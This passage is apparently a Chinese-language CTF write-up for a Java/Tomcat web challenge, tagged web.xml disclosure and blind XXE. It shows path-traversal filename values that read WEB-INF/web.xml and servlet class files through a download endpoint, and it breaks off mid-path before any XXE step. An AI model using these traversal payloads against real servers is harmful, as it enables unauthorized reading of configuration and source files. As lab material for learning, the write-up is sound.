知识点
web.xml文件泄露
blind xxe
用到的工具:
burpsuit或者hackbar都可以
一、审题
1.打开题目
2.收集信息
2.1随便上传一个文件,然后点击下载,抓包
看到有filename,猜测可能存在目录穿越以及任意文件下载
2.2尝试通过报错来获取网站的绝对路径,设置URL参数filename=../
二、探查敏感信息
1.探查敏感信息
1.1爆出了绝对路径
路径里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取,修改filename参数如下(…/数量随意写几个):
filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml
1.2下载源码
这里因为不知道配置文件的具体位置就用…/来代替具体多少慢慢试,可以看到再上图右边其中显示出了源码,以此下载下来,路径分别是
filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
filename=../../../../../../../../../usr/l